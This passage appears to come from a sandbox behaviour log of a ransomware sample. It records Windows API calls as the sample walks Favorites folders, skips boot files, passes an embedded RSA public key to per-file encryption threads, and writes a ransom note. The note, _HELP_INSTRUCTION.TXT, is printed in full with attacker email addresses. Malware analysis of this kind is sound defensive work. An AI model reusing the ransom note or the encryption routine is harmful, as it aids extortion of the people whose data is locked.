Websites\\", lpSrch="Desktop") returned 0x0 [0137.454] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.454] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0137.454] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.454] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Autos.url" | out: lpString1="MSN Autos.url") returned="MSN Autos.url" [0137.454] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x790 [0137.455] Sleep (dwMilliseconds=0x96) [0137.597] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.597] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="..") returned 1 [0137.597] lstrcmpW (lpString1="MSN Entertainment.url", lpString2=".") returned 1 [0137.597] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.597] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntldr") returned 0x0 [0137.597] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTLDR") returned 0x0 [0137.598] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.598] StrStrW (lpFirst="MSN Entertainment.url", lpSrch="ntdetect.com") returned 0x0 [0137.598] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0137.598] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.598] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0137.598] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.598] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Entertainment.url" | out: lpString1="MSN Entertainment.url") returned="MSN Entertainment.url" [0137.598] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x794 [0137.598] Sleep (dwMilliseconds=0x96) [0137.754] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.754] lstrcmpW (lpString1="MSN Money.url", lpString2="..") returned 1 [0137.754] lstrcmpW (lpString1="MSN Money.url", lpString2=".") returned 1 [0137.754] StrStrW (lpFirst="MSN Money.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.754] StrStrW (lpFirst="MSN Money.url", lpSrch="ntldr") returned 0x0 [0137.754] StrStrW (lpFirst="MSN Money.url", lpSrch="NTLDR") returned 0x0 [0137.754] StrStrW (lpFirst="MSN Money.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.754] StrStrW (lpFirst="MSN Money.url", lpSrch="ntdetect.com") returned 0x0 [0137.754] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0137.754] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.754] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0137.754] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.754] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Money.url" | out: lpString1="MSN Money.url") returned="MSN Money.url" [0137.754] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x798 [0137.755] Sleep (dwMilliseconds=0x96) [0137.909] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0137.909] lstrcmpW (lpString1="MSN Sports.url", lpString2="..") returned 1 [0137.909] lstrcmpW (lpString1="MSN Sports.url", lpString2=".") returned 1 [0137.909] StrStrW (lpFirst="MSN Sports.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0137.909] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntldr") returned 0x0 [0137.909] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTLDR") returned 0x0 [0137.909] StrStrW (lpFirst="MSN Sports.url", lpSrch="NTDETECT.COM") returned 0x0 [0137.909] StrStrW (lpFirst="MSN Sports.url", lpSrch="ntdetect.com") returned 0x0 [0137.909] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0137.909] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0137.909] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0137.910] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0137.910] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0137.910] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0137.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x79c [0137.910] Sleep (dwMilliseconds=0x96) [0138.065] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.065] lstrcmpW (lpString1="MSN.url", lpString2="..") returned 1 [0138.065] lstrcmpW (lpString1="MSN.url", lpString2=".") returned 1 [0138.065] StrStrW (lpFirst="MSN.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.065] StrStrW (lpFirst="MSN.url", lpSrch="ntldr") returned 0x0 [0138.065] StrStrW (lpFirst="MSN.url", lpSrch="NTLDR") returned 0x0 [0138.066] StrStrW (lpFirst="MSN.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.066] StrStrW (lpFirst="MSN.url", lpSrch="ntdetect.com") returned 0x0 [0138.066] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0138.066] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0138.066] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0138.066] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.066] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0138.066] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0138.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7a0 [0138.066] Sleep (dwMilliseconds=0x96) [0138.222] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.222] lstrcmpW (lpString1="MSNBC News.url", lpString2="..") returned 1 [0138.222] lstrcmpW (lpString1="MSNBC News.url", lpString2=".") returned 1 [0138.222] StrStrW (lpFirst="MSNBC News.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.222] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntldr") returned 0x0 [0138.222] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTLDR") returned 0x0 [0138.222] StrStrW (lpFirst="MSNBC News.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.222] StrStrW (lpFirst="MSNBC News.url", lpSrch="ntdetect.com") returned 0x0 [0138.222] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0138.222] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0138.222] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 44 [0138.223] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0138.223] lstrcpyW (in: lpString1=0x17be7c, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0138.223] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\" [0138.223] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x7a4 [0138.223] Sleep (dwMilliseconds=0x96) [0138.377] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0138.377] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0138.378] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0138.378] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites") returned="C:\\Users\\Default\\Favorites\\MSN Websites" [0138.378] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*" [0138.378] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="Desktop") returned 0x0 [0138.378] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="DESKTOP") returned 0x0 [0138.378] SetErrorMode (uMode=0x1) returned 0x1 [0138.378] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT") returned 61 [0138.379] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0138.379] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0138.379] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x7a8) returned 0x0 [0138.379] RegQueryValueExW (in: hKey=0x7a8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d018c0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d018c0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0138.379] RegCloseKey (hKey=0x7a8) returned 0x0 [0138.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0138.379] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0138.379] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0138.380] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\favorites\\msn websites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0138.382] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0138.382] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\MSN Websites") returned="MSN Websites" [0138.383] lstrcpyW (in: lpString1=0x17b644, lpString2="MSN Websites" | out: lpString1="MSN Websites") returned="MSN Websites" [0138.383] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0138.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.383] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0138.383] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0138.384] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0138.384] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0138.384] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0138.384] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0138.384] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Favorites" | out: lpString1="C:\\Users\\Default\\Favorites") returned="C:\\Users\\Default\\Favorites" [0138.384] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\") returned="C:\\Users\\Default\\Favorites\\" [0138.384] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0138.384] SetErrorMode (uMode=0x1) returned 0x1 [0138.384] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Favorites\\Windows Live" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live") returned="C:\\Users\\Default\\Favorites\\Windows Live" [0138.384] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.384] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0138.385] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\*.*") returned="C:\\Users\\Default\\Favorites\\Windows Live\\*.*" [0138.385] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3d11398 [0138.386] PathFindFileNameW (pszPath="C:\\Users\\Default\\Favorites\\Windows Live") returned="Windows Live" [0138.386] lstrcpyW (in: lpString1=0x17b644, lpString2="Windows Live" | out: lpString1="Windows Live") returned="Windows Live" [0138.386] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.386] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0138.386] lstrcmpW (lpString1="Get Windows Live.url", lpString2="..") returned 1 [0138.386] lstrcmpW (lpString1="Get Windows Live.url", lpString2=".") returned 1 [0138.386] StrStrW (lpFirst="Get Windows Live.url", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0138.386] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntldr") returned 0x0 [0138.386] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTLDR") returned 0x0 [0138.386] StrStrW (lpFirst="Get Windows Live.url", lpSrch="NTDETECT.COM") returned 0x0 [0138.386] StrStrW (lpFirst="Get Windows Live.url", lpSrch="ntdetect.com") returned 0x0 [0138.386] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="Desktop") returned 0x0 [0138.386] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="DESKTOP") returned 0x0 [0138.386] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned 44 [0138.387] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 